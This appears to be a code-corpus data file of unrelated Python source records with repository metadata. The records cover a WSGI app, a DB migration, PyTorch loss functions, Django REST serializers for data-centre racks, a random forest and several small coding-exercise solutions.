request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
    def __call__(self, environ, start_response):
        # Make the application object itself a WSGI callable.
        return self.wsgi_app(environ, start_response)
def create_app():
    """Application factory: return a fresh WebKDC WSGI application."""
    return WebKDC()
def main():
    """Run a local debug server; optional argv[1] is "host:port"."""
    # pylint: disable=import-outside-toplevel
    import sys
    from werkzeug.serving import run_simple
    app = create_app()
    ip = '127.0.0.1'
    port = 5000
    if len(sys.argv) > 1:
        arg = sys.argv[1]
        # Fail with a usage message instead of an unpacking traceback
        # when the argument has no ":port" part.
        if ':' not in arg:
            raise SystemExit('usage: %s [host:port]' % sys.argv[0])
        ip, port = arg.rsplit(':', 1)
        port = int(port)
    run_simple(ip, port, app, use_debugger=True, use_reloader=True)
if __name__ == '__main__':
    main()
| 34.150215 | 98 | 0.613045 | 5,727 | 0.719744 | 0 | 0 | 1,110 | 0.1395 | 0 | 0 | 2,574 | 0.323489 |
1d248c7603b5f2ad59f69f3e1de31b7ccc44d34b | 1,980 | py | Python | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 22 | 2015-04-09T09:00:00.000Z | 2022-03-23T00:16:04.000Z | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 119 | 2015-02-11T21:39:27.000Z | 2021-07-27T23:04:49.000Z | dedupsqlfs/db/migrations/m20171103001.py | tabulon-ext/dedupsqlfs | 9dfbed17450e7f2a499a7381e0368d08ae3c700d | [
"MIT"
] | 7 | 2016-03-16T11:53:45.000Z | 2022-02-24T13:47:31.000Z | # -*- coding: utf8 -*-
#
# DB migration 001 by 2017-11-03
#
# New statistics for subvolume - root diff in blocks / bytes
#
__author__ = 'sergey'
__NUMBER__ = 20171103001
def run(manager):
    """
    Migration 20171103001: add root-diff statistics to the subvolume table.

    Adds the ``root_diff`` (TEXT) and ``root_diff_at`` (timestamp) columns
    when missing, then records this migration number in the ``option``
    table.

    :param manager: Database manager
    :type manager: dedupsqlfs.db.sqlite.manager.DbManager|dedupsqlfs.db.mysql.manager.DbManager
    :return: bool -- True on success, False if the schema change failed
    """
    try:
        table_sv = manager.getTable("subvolume")
        """
        :type table_sv: dedupsqlfs.db.sqlite.table.subvolume.TableSubvolume |
                        dedupsqlfs.db.mysql.table.subvolume.TableSubvolume
        """
        cur = table_sv.getCursor()
        manager.getLogger().info("Migration #%s" % (__NUMBER__,))
        if not table_sv.hasField('root_diff'):
            # Identical column type on both supported backends, so the
            # previously duplicated sqlite/mysql branches are merged.
            if manager.TYPE in ("sqlite", "mysql"):
                cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff` TEXT;")
        if not table_sv.hasField('root_diff_at'):
            # Column type differs per backend here.
            if manager.TYPE == "sqlite":
                cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff_at` INTEGER;")
            if manager.TYPE == "mysql":
                cur.execute("ALTER TABLE `subvolume` ADD COLUMN `root_diff_at` INT UNSIGNED;")
        table_sv.commit()
        table_sv.close()
    except Exception as e:
        import traceback
        manager.getLogger().error("Migration #%s error: %s" % (__NUMBER__, e,))
        manager.getLogger().error("Migration #%s trace:\n%s" % (__NUMBER__, traceback.format_exc(),))
        return False
    # Record that this migration has been applied.
    table_opts = manager.getTable("option")
    table_opts.getCursor()
    mignumber = table_opts.get("migration")
    if not mignumber:
        table_opts.insert("migration", __NUMBER__)
    else:
        table_opts.update("migration", __NUMBER__)
    table_opts.commit()
    return True
| 30 | 101 | 0.622222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 862 | 0.435354 |
1d268f5884d3edaa2ebd73f6bea09ab2e7e7400f | 582 | py | Python | tests/test_keywords.py | VeerendraNathLukkani/pytest_test | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 51 | 2018-04-26T09:02:38.000Z | 2021-11-21T10:57:32.000Z | tests/test_keywords.py | VeerendraNathLukkani/pytest_test | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 39 | 2017-12-20T14:27:33.000Z | 2018-04-05T22:45:12.000Z | tests/test_keywords.py | tierratelematics/pytest-play | c39a1a7e74d90aebeb30797a61d0e491942557e8 | [
"Apache-2.0"
] | 5 | 2018-06-30T15:51:39.000Z | 2020-04-13T19:31:25.000Z | import pytest
@pytest.mark.parametrize("cli_options", [
    ('-k', 'notestdeselect',),
])
def test_autoexecute_yml_keywords_skipped(testdir, cli_options):
    # A -k expression matching no test name deselects the generated yml
    # scenario entirely, so pytest reports zero passed/failed/error outcomes.
    yml_file = testdir.makefile(".yml", """
    ---
    markers:
      - marker1
      - marker2
    ---
    - provider: python
      type: assert
      expression: "1"
    """)
    assert yml_file.basename.startswith('test_')
    assert yml_file.basename.endswith('.yml')
    result = testdir.runpytest(*cli_options)
    result.assert_outcomes(passed=0, failed=0, error=0)
    # Deselected, not skipped. See #3427
    # result.assert_outcomes(skipped=1)
| 22.384615 | 64 | 0.685567 | 0 | 0 | 0 | 0 | 565 | 0.97079 | 0 | 0 | 227 | 0.390034 |
1d27314ab7fea8509c861472d1fd1cdbc7becfb3 | 224 | py | Python | python/find_largest_divisor.py | codevscolor/codevscolor | 35ef9042bdc86f45ef87795c35963b75fb64d5d7 | [
"Apache-2.0"
] | 6 | 2019-04-26T03:11:54.000Z | 2021-05-07T21:48:29.000Z | python/find_largest_divisor.py | akojif/codevscolor | 56db3dffeac8f8d76ff8fcf5656770f33765941f | [
"Apache-2.0"
] | null | null | null | python/find_largest_divisor.py | akojif/codevscolor | 56db3dffeac8f8d76ff8fcf5656770f33765941f | [
"Apache-2.0"
] | 26 | 2019-02-23T14:50:46.000Z | 2022-02-04T23:44:24.000Z | #1
num = int(input("Enter a number : "))
largest_divisor = 0
#2
for i in range(2, num):
#3
if num % i == 0:
#4
largest_divisor = i
#5
print("Largest divisor of {} is {}".format(num,largest_divisor))
| 18.666667 | 64 | 0.575893 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 58 | 0.258929 |
1d27a3363d2c72c8ff7fcb62450ccd526ce19065 | 1,532 | py | Python | lintcode/0008-rotate-string.py | runzezhang/Data-Structure-and-Algorithm-Notebook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | 1 | 2020-07-24T03:37:05.000Z | 2020-07-24T03:37:05.000Z | lintcode/0008-rotate-string.py | runzezhang/Code-NoteBook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | null | null | null | lintcode/0008-rotate-string.py | runzezhang/Code-NoteBook | 15a94d7df2ac1d2ad081004d61433324654085e5 | [
"Apache-2.0"
] | null | null | null | # Description
# 中文
# English
# Given a string(Given in the way of char array) and an offset, rotate the string by offset in place. (rotate from left to right)
# offset >= 0
# the length of str >= 0
# Have you met this question in a real interview?
# Example
# Example 1:
# Input: str="abcdefg", offset = 3
# Output: str = "efgabcd"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "efgabcd".
# Example 2:
# Input: str="abcdefg", offset = 0
# Output: str = "abcdefg"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "abcdefg".
# Example 3:
# Input: str="abcdefg", offset = 1
# Output: str = "gabcdef"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "gabcdef".
# Example 4:
# Input: str="abcdefg", offset =2
# Output: str = "fgabcde"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "fgabcde".
# Example 5:
# Input: str="abcdefg", offset = 10
# Output: str = "efgabcd"
# Explanation: Note that it is rotated in place, that is, after str is rotated, it becomes "efgabcd".
class Solution:
    def rotateString(self, s, offset):
        """
        @param s: An array of char, rotated in place
        @param offset: An integer (may exceed len(s))
        @return: nothing
        """
        n = len(s)
        if n == 0:
            return
        shift = offset % n
        # Last `shift` chars move to the front; shift == 0 yields a copy
        # of the original order, so the write-back is a no-op.
        rotated = s[n - shift:] + s[:n - shift]
        for index, char in enumerate(rotated):
            s[index] = char
1d28dceef64377a9dfc091e14cb2bc5b41317fb7 | 5,854 | py | Python | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | null | null | null | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | 1 | 2018-10-18T18:49:33.000Z | 2018-10-18T18:49:33.000Z | CIFAR10/losses.py | ankanbansal/semi-supervised-learning | 1aa16e2a7ae10908f70bf9657d26a49bacc50be9 | [
"Apache-2.0"
] | 1 | 2018-10-18T20:59:18.000Z | 2018-10-18T20:59:18.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import ipdb
import time
# Clustering penalties
class ClusterLoss(torch.nn.Module):
    """
    Cluster loss from the SuBiC paper, returned as two terms:

    * Mean Entropy Loss (L1): pushes each per-sample output towards a
      one-hot vector (low per-sample entropy).
    * Negative Batch Entropy Loss (L2): pushes the batch-averaged output
      towards a uniform distribution over the output (uniform block
      support).
    """
    def __init__(self):
        super(ClusterLoss, self).__init__()

    def entropy(self, logits):
        """Entropy of softmax(logits) along dim 0; expects a 1-D tensor."""
        return -1.0*(F.softmax(logits, dim=0)*F.log_softmax(logits, dim=0)).sum()

    def forward(self, logits):
        """
        Input: logits -> T x K  (T = batch size, K = number of classes)
        Output: (L1, L2) = (mean entropy loss, negative batch entropy loss)
        """
        # Mean Entropy Loss - for one-hotness.
        # Vectorized over the batch: one tensor op instead of a Python
        # loop filling a T x 1 buffer -- same math, no per-sample copies.
        per_sample_entropy = -1.0*(
            F.softmax(logits, dim=1)*F.log_softmax(logits, dim=1)).sum(dim=1)
        L1 = per_sample_entropy.mean()
        # Batch Entropy Loss - for uniform support.
        mean_output = torch.mean(logits, dim=0)
        L2 = -1.0*self.entropy(mean_output)
        return L1.cuda(), L2.cuda()
# Stochastic Transformation Stability Loss. Introduced in:
# "Regularization With Stochastic Transformations and Perturbations for Deep Semi-Supervised
# Learning"
class StochasticTransformationLoss(torch.nn.Module):
    """
    Stochastic Transformation stability loss ("Regularization With
    Stochastic Transformations and Perturbations for Deep Semi-Supervised
    Learning"): stochastic transformations of an image (flips,
    translations) should produce features that are close to each other.
    """
    def __init__(self):
        super(StochasticTransformationLoss, self).__init__()

    def entropy(self, logits):
        """
        Input: logits -> N x 1 x D  (D = feature dimension)
        Output: entropy -> N x 1
        """
        # TODO: Check if this is correct
        return -1.0*(F.softmax(logits, dim=-1)*F.log_softmax(logits, dim=-1)).sum(-1)

    def cross_entropy(self, logits1, logits2):
        """
        Input: logits1 -> N x 1 x D, logits2 -> 1 x N x D
        Output: pairwise cross-entropy -> N x N (via broadcasting)
        """
        # TODO: Check if this is correct
        return -1.0*(F.softmax(logits1, dim=-1)*F.log_softmax(logits2, dim=-1)).sum(-1)

    def distances(self, A, distance_type='Euclidean', eps=1e-6):
        """
        Input: A -> num_transformations x D  (D = feature dimension)
               distance_type -> 'Euclidean'/'cosine'/'KL'
        Output: num_transformations x num_transformations pairwise distances
        """
        assert A.dim() == 2
        if distance_type == 'Euclidean':
            # Broadcasted pairwise differences: numerically stable, at the
            # cost of an N x N x D intermediate. (The ||a||^2 + ||b||^2
            # - 2ab form uses less memory but suffers rounding errors.)
            B = A.unsqueeze(1)
            C = A.unsqueeze(0)
            differences = B - C
            distances = torch.sum(differences*differences, -1)  # N x N
            # Squared distances -- the paper does not take the sqrt.
        elif distance_type == 'cosine':
            B = F.normalize(A, p=2, dim=1)
            distances = 1.0 - torch.matmul(B, B.t())  # N x N
        elif distance_type == 'KL':
            # Make sure that A contains logits here.
            B = A.unsqueeze(1)
            C = A.unsqueeze(0)
            # TODO: Might have to use a symmetric KL div. Check -- still
            # probably incorrect, possibly due to the cross_entropy
            # implementation above.
            distances = -1.0*self.entropy(B) + self.cross_entropy(B, C)  # N x N
        return distances

    def forward(self, features, num_transformations, distance_type='Euclidean'):
        """
        Input: features -> T x D  (T = batch size, which must be a
               multiple of num_transformations; consecutive rows are the
               transformed versions of the same image)
        Output: ST loss (scalar)
        """
        batch_size = features.shape[0]
        # Floor division: plain "/" yields a float on Python 3, which
        # makes range() raise TypeError; "//" is identical on Python 2.
        all_index_groups = [[(i*num_transformations)+j
                             for j in range(num_transformations)]
                            for i in range(batch_size // num_transformations)]
        total_loss = 0.0
        for i in range(len(all_index_groups)):
            split_features = torch.index_select(
                features, 0, torch.cuda.LongTensor(all_index_groups[i]))
            distances = self.distances(split_features,
                                       distance_type=distance_type)
            total_loss += 0.5*torch.sum(distances)
        total_loss = total_loss / (1.0*batch_size)
        # Don't know how exactly should we average. Per pair? Per image?
        return total_loss
def get_loss(loss_name = 'CE'):
    """Factory returning the named criterion, moved to the GPU.

    NOTE(review): an unrecognised ``loss_name`` leaves ``criterion``
    unbound and raises UnboundLocalError at the return -- confirm this
    is intended.
    """
    if loss_name == 'CE':
        # ignore_index ignores the samples which have label -1000. We mark
        # the unsupervised images with label -1000.
        criterion = nn.CrossEntropyLoss(ignore_index = -1000).cuda()
    elif loss_name == 'ClusterLoss':
        criterion = ClusterLoss().cuda()
    elif loss_name == 'LocalityLoss':
        # NOTE(review): LocalityLoss / CAMLocalityLoss / LocalityEntropyLoss
        # are not defined in this chunk -- presumably defined elsewhere in
        # the module; verify before use.
        criterion = LocalityLoss().cuda()
    elif loss_name == 'CAMLocalityLoss':
        criterion = CAMLocalityLoss().cuda()
    elif loss_name == 'LEL':
        criterion = LocalityEntropyLoss().cuda()
    elif loss_name == 'STLoss':
        criterion = StochasticTransformationLoss().cuda()
    return criterion
| 41.51773 | 139 | 0.625726 | 4,857 | 0.829689 | 0 | 0 | 0 | 0 | 0 | 0 | 2,768 | 0.472839 |
1d2a9842977980ab181e2ea21da18fb3dfcb4476 | 1,134 | py | Python | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 34 | 2021-05-08T08:43:05.000Z | 2022-03-30T03:03:45.000Z | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 5 | 2021-05-14T19:50:17.000Z | 2021-11-23T23:44:44.000Z | roles/monitoring/files/cluster_monitoring_library.py | dubalda/sv-manager | 207824faf96296e9a051f959115f0f60b9a22c0e | [
"Apache-2.0"
] | 17 | 2021-05-10T21:42:25.000Z | 2022-02-23T18:03:31.000Z | import solana_rpc as rpc
def get_apr_from_rewards(rewards_data):
    """Extract {'percent_change', 'apr'} records from a stake-rewards
    payload; returns [] for None or a payload without 'epochRewards'."""
    if rewards_data is None or 'epochRewards' not in rewards_data:
        return []
    return [{'percent_change': epoch['percentChange'], 'apr': epoch['apr']}
            for epoch in rewards_data['epochRewards']]
def calc_single_apy(apr, percent_change):
    """Compound the per-epoch percentage over apr/percent_change epochs
    and return the resulting APY (in percent)."""
    epochs = apr / percent_change
    growth = (1 + percent_change / 100) ** epochs
    return (growth - 1) * 100
def calc_apy_list_from_apr(apr_per_epoch):
    """Map per-epoch APR records (dicts with 'apr' and 'percent_change')
    to a list of APY values."""
    return [calc_single_apy(record['apr'], record['percent_change'])
            for record in apr_per_epoch]
def process(validators):
    """For each validator, fetch its stake-account rewards via RPC and
    compute the list of per-epoch APY values."""
    results = []
    for validator in validators:
        rewards = rpc.load_stake_account_rewards(validator['stake_account'])
        results.append(calc_apy_list_from_apr(get_apr_from_rewards(rewards)))
    return results
| 24.652174 | 81 | 0.641093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 105 | 0.092593 |
1d2bb1990a65ce8c94ef800f677963660b1de9dc | 5,545 | py | Python | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | src/ralph_assets/rest/serializers/models_dc_asssets.py | vi4m/ralph_assets | d174e8f769da2d5a335d24bbef5d0ca2e205383c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.core.urlresolvers import reverse
from rest_framework import serializers
from ralph_assets.models_dc_assets import (
DataCenter,
Rack,
RackAccessory,
RackOrientation,
)
from ralph_assets.models import Asset
TYPE_EMPTY = 'empty'
TYPE_ACCESSORY = 'accessory'
TYPE_ASSET = 'asset'
TYPE_PDU = 'pdu'
class AdminMixin(serializers.ModelSerializer):
    """
    Mixin providing ``admin_link`` -- the Django admin change-view URL
    for the serialized object.
    """
    def admin_link(self, obj):
        meta = obj._meta
        view_name = 'admin:{app_label}_{module_name}_change'.format(
            app_label=meta.app_label,
            module_name=meta.module_name,
        )
        return reverse(view_name, args=(obj.id,))
class AssetSerializerBase(serializers.ModelSerializer):
    # Fields shared by all asset serializers; SerializerMethodField names
    # refer to the get_* methods defined below.
    model = serializers.CharField(source='model.name')
    url = serializers.SerializerMethodField('get_absolute_url')
    core_url = serializers.SerializerMethodField('get_core_url')
    hostname = serializers.SerializerMethodField('get_hostname')
    service = serializers.CharField(source='service.name')
    orientation = serializers.SerializerMethodField('get_orientation')
    def get_orientation(self, obj):
        # Assets whose device_info lacks orientation support default to
        # 'front'.
        if not hasattr(obj.device_info, 'get_orientation_desc'):
            return 'front'
        return obj.device_info.get_orientation_desc()
    def get_absolute_url(self, obj):
        # The asset's own detail URL.
        return obj.get_absolute_url()
    def get_core_url(self, obj):
        """
        Return the URL to device in core, or None when the asset has no
        linked core device.
        """
        url = None
        device_core_id = obj.device_info.ralph_device_id
        if device_core_id:
            url = reverse('search', kwargs={
                'details': 'info', 'device': device_core_id
            })
        return url
    def get_hostname(self, obj):
        # Empty string when no device is linked to the asset.
        device = obj.linked_device
        return device.name if device else ''
class RelatedAssetSerializer(AssetSerializerBase):
    # Serializer for child assets; slot occupied inside the parent asset.
    slot_no = serializers.CharField(source='device_info.slot_no')
    class Meta:
        model = Asset
        fields = (
            'id', 'model', 'barcode', 'sn', 'slot_no', 'url', 'core_url',
            'hostname', 'service', 'orientation'
        )
class AssetSerializer(AssetSerializerBase):
    # Presentation fields for a top-level (rack-mounted) asset.
    category = serializers.CharField(source='model.category.name')
    height = serializers.FloatField(source='model.height_of_device')
    front_layout = serializers.CharField(source='model.get_front_layout_class')
    back_layout = serializers.CharField(source='model.get_back_layout_class')
    position = serializers.IntegerField(source='device_info.position')
    # Assets mounted inside this one (e.g. blades in a chassis).
    children = RelatedAssetSerializer(
        source='get_related_assets',
        many=True,
    )
    _type = serializers.SerializerMethodField('get_type')
    management_ip = serializers.SerializerMethodField('get_management')
    url = serializers.SerializerMethodField('get_absolute_url')
    def get_type(self, obj):
        # Discriminator consumed by the rack visualization front-end.
        return TYPE_ASSET
    def get_management(self, obj):
        # Management IP of the linked core device; empty string when the
        # asset has no linked device or no management address.
        device = obj.linked_device
        if not device:
            return ''
        management_ip = device.management_ip
        return management_ip.address if management_ip else ''
    class Meta:
        model = Asset
        fields = (
            'id', 'model', 'category', 'height', 'front_layout', 'back_layout',
            'barcode', 'sn', 'url', 'core_url', 'position', 'children',
            '_type', 'hostname', 'management_ip', 'service', 'orientation'
        )
class RackAccessorySerializer(serializers.ModelSerializer):
    # Accessory name exposed as 'type' for the UI.
    type = serializers.CharField(source='accessory.name')
    _type = serializers.SerializerMethodField('get_type')
    orientation = serializers.SerializerMethodField('get_orientation')
    def get_type(self, obj):
        # Discriminator consumed by the rack visualization front-end.
        return TYPE_ACCESSORY
    def get_orientation(self, obj):
        # Human-readable orientation of the accessory within the rack.
        return obj.get_orientation_desc()
    class Meta:
        model = RackAccessory
        fields = ('position', 'orientation', 'remarks', 'type', '_type')
class PDUSerializer(serializers.ModelSerializer):
    """Serializer for PDU assets mounted in a rack."""
    model = serializers.CharField(source='model.name')
    # get_orientation_desc yields a textual description -- RackSerializer
    # exposes the very same source as a CharField, so an IntegerField here
    # mistyped the value. Made consistent.
    orientation = serializers.CharField(source='get_orientation_desc')
    url = serializers.CharField(source='get_absolute_url')
    def get_type(self, obj):
        # Note: not wired to a SerializerMethodField here; kept for parity
        # with the other serializers.
        return TYPE_PDU
    class Meta:
        model = Asset
        fields = ('model', 'sn', 'orientation', 'url')
class RackSerializer(AdminMixin, serializers.ModelSerializer):
    # Remaining free rack units, computed by the model.
    free_u = serializers.IntegerField(source='get_free_u', read_only=True)
    # Human-readable orientation; translated back to an id in update().
    orientation = serializers.CharField(source='get_orientation_desc')
    rack_admin_url = serializers.SerializerMethodField('admin_link')
    class Meta:
        model = Rack
        fields = (
            'id', 'name', 'data_center', 'server_room', 'max_u_height',
            'visualization_col', 'visualization_row', 'free_u', 'description',
            'orientation', 'rack_admin_url',
        )
    def update(self):
        # Map the textual orientation back to its RackOrientation id, then
        # save with the serializer's own data.
        # NOTE(review): unusual signature for a serializer update() --
        # confirm callers rely on this zero-argument form.
        orientation = self.data['orientation']
        self.object.orientation = RackOrientation.id_from_name(orientation)
        return self.save(**self.data)
class DCSerializer(AdminMixin, serializers.ModelSerializer):
    # Nested racks serialized with the full RackSerializer.
    rack_set = RackSerializer()
    # NOTE(review): the field name 'admin_link' matches the
    # AdminMixin.admin_link method it points at -- confirm DRF resolves
    # this as intended (RackSerializer avoids the clash by naming its
    # field 'rack_admin_url').
    admin_link = serializers.SerializerMethodField('admin_link')
    class Meta:
        model = DataCenter
        fields = ('id', 'name', 'visualization_cols_num',
                  'visualization_rows_num', 'rack_set', 'admin_link')
        # Serialize one level of related objects (the racks).
        depth = 1
| 32.238372 | 79 | 0.679892 | 5,021 | 0.9055 | 0 | 0 | 0 | 0 | 0 | 0 | 1,267 | 0.228494 |
1d2cf95c0dec50f1e5b2fe20f8276992a649f783 | 2,163 | py | Python | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | 2 | 2020-04-20T15:41:53.000Z | 2021-11-25T18:52:20.000Z | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | null | null | null | endochrone/ensemble/random_forest.py | nickwood/endochrone | 050a2604be82ee4cd5ee6357ea72d3d6d4117277 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import time
from endochrone import Base
from endochrone.classification import BinaryDecisionTree
__author__ = "nickwood"
__copyright__ = "nickwood"
__license__ = "mit"
class RandomForest(Base):
    """
    Bagged ensemble of binary decision trees.

    Each tree is fitted on a bootstrap sample of the training data and,
    optionally, on a random subset of the feature columns. Predictions
    are made by majority vote across trees.
    """
    def __init__(self, n_trees, sample_size=None, feat_per_tree=None,
                 max_tree_depth=None):
        # n_trees: number of trees in the forest
        # sample_size: bootstrap sample size per tree (default 2*n/n_trees)
        # feat_per_tree: number of feature columns per tree (default: all)
        # max_tree_depth: depth limit passed to each BinaryDecisionTree
        self.n_trees = n_trees
        self.samp_per_tree = sample_size
        self.feat_per_tree = feat_per_tree
        self.max_tree_depth = max_tree_depth
        self.trees = []
        # Per-tree column indices chosen in fit(); None means "all columns".
        # predict() must slice x the same way fit() did -- previously trees
        # trained on a feature subset were fed the full-width x at
        # prediction time, so their splits referenced the wrong columns.
        self.tree_features = []
        super().__init__()

    def fit(self, x, y, debug=False):
        """Fit n_trees trees on bootstrap samples of (x, y); returns self."""
        self.validate_fit(features=x, targets=y)
        n_samples = x.shape[0]
        if self.samp_per_tree is None:
            self.samp_per_tree = int(2 * n_samples / self.n_trees)
        self.trees = [BinaryDecisionTree(max_depth=self.max_tree_depth)
                      for i in range(self.n_trees)]
        self.tree_features = []
        for tree in self.trees:
            t0 = time.process_time()
            if self.feat_per_tree is None:
                feat_idx = None
                x_feat = x
            else:
                if self.feat_per_tree > x.shape[1]:
                    raise ValueError("More features specified than available")
                feat_idx = np.random.choice(range(x.shape[1]),
                                            self.feat_per_tree, replace=False)
                x_feat = x[:, feat_idx]
            self.tree_features.append(feat_idx)
            x_samp, y_samp = take_samples(self.samp_per_tree, x_feat, y)
            tree.fit(x_samp, y_samp)
            t1 = time.process_time()
            if debug:
                print("tree fitted in %.06f seconds" % (t1-t0))
        return self

    def predict(self, x):
        """Predict by majority vote; each tree sees the columns it was
        trained on."""
        self.validate_predict(features=x)
        # Backwards compatibility: forests fitted before feature tracking
        # existed fall back to full-width input for every tree.
        feature_sets = self.tree_features or [None] * len(self.trees)
        votes = [tree.predict(x if idx is None else x[:, idx])
                 for tree, idx in zip(self.trees, feature_sets)]
        predictions = np.transpose(votes)
        return np.array([consensus(v) for v in predictions])
def consensus(votes):
    """Majority vote: the most frequent value (ties resolve to the
    smallest value, since np.unique returns values sorted)."""
    values, tallies = np.unique(votes, return_counts=True)
    return values[tallies.argmax()]
def take_samples(sample_size, x, y):
    """Draw a bootstrap sample (with replacement) of matching rows from
    x and y."""
    chosen = np.random.choice(range(len(x)), sample_size)
    return x[chosen], y[chosen]
def take_features(n_features, x, y):
    """Return x restricted to n_features randomly chosen distinct columns.

    Raises ValueError when more features are requested than x provides.
    The y argument is unused but kept for signature compatibility.
    """
    if n_features > x.shape[1]:
        raise ValueError("More features specified than available")
    chosen = np.random.choice(range(len(x[0])), n_features, replace=False)
    return x[:, chosen]
| 31.808824 | 72 | 0.626445 | 1,383 | 0.63939 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.054554 |
1d2f8198cf092ac9dcd093d637fd09e17f523d59 | 65 | py | Python | projects/microphysics/scripts/config.py | jacnugent/fv3net | 84958651bdd17784fdab98f87ad0d65414c03368 | [
"MIT"
] | 5 | 2021-03-20T22:42:40.000Z | 2021-06-30T18:39:36.000Z | projects/microphysics/scripts/config.py | jacnugent/fv3net | 84958651bdd17784fdab98f87ad0d65414c03368 | [
"MIT"
] | 195 | 2021-09-16T05:47:18.000Z | 2022-03-31T22:03:15.000Z | projects/microphysics/scripts/config.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 1 | 2021-06-16T22:04:24.000Z | 2021-06-16T22:04:24.000Z | BUCKET = "vcm-ml-experiments"
PROJECT = "microphysics-emulation"
| 21.666667 | 34 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.676923 |
1d2fc36b7b8ff3b5ce1d287df0ac8a8feac9ce2e | 330 | py | Python | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 2 | 2018-03-29T18:21:01.000Z | 2022-02-08T10:49:47.000Z | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 7 | 2018-09-03T12:31:52.000Z | 2022-02-01T08:25:09.000Z | seatsio/events/objectProperties.py | nathanielwarner/seatsio-python | e731ed0c37f2496c620b40e38527a58bf3b9a9b2 | [
"MIT"
] | 2 | 2020-12-22T09:51:07.000Z | 2021-12-13T15:37:14.000Z | class ObjectProperties:
def __init__(self, object_id, extra_data=None, ticket_type=None, quantity=None):
if extra_data:
self.extraData = extra_data
self.objectId = object_id
if ticket_type:
self.ticketType = ticket_type
if quantity:
self.quantity = quantity
| 33 | 84 | 0.636364 | 329 | 0.99697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
1d2fdc2424cb9c6df54a0b050148d4cc5b4644c3 | 463 | py | Python | Leetcode/1096. Brace Expansion II/solution1.py | asanoviskhak/Outtalent | c500e8ad498f76d57eb87a9776a04af7bdda913d | [
"MIT"
] | 51 | 2020-07-12T21:27:47.000Z | 2022-02-11T19:25:36.000Z | Leetcode/1096. Brace Expansion II/solution1.py | CrazySquirrel/Outtalent | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | [
"MIT"
] | null | null | null | Leetcode/1096. Brace Expansion II/solution1.py | CrazySquirrel/Outtalent | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | [
"MIT"
] | 32 | 2020-07-27T13:54:24.000Z | 2021-12-25T18:12:50.000Z | import re
class Solution:
    def helper(self, expression: str) -> List[str]:
        """Expand the first (innermost) {a,b,...} group and recurse;
        returns the set of fully expanded strings."""
        match = re.search("\{([^}{]+)\}", expression)
        if match is None:
            return {expression}
        options = match.group(1)
        whole_group = '{' + options + '}'
        expanded = set()
        for choice in options.split(','):
            # replace(..., 1) substitutes at the match position, since
            # re.search found the first occurrence of this exact group.
            expanded |= self.helper(expression.replace(whole_group, choice, 1))
        return expanded

    def braceExpansionII(self, expression: str) -> List[str]:
        """All distinct words the expression represents, sorted."""
        return sorted(self.helper(expression))
| 22.047619 | 74 | 0.542117 | 450 | 0.971922 | 0 | 0 | 0 | 0 | 0 | 0 | 23 | 0.049676 |
1d319276207ded7138c364ab240ee169b00896eb | 455 | py | Python | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
] | null | null | null | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
] | null | null | null | 3-longest-substring-without-repeating-characters.py | Iciclelz/leetcode | e4b698e0161033922851641885fdc6e47f9ce270 | [
"Apache-2.0"
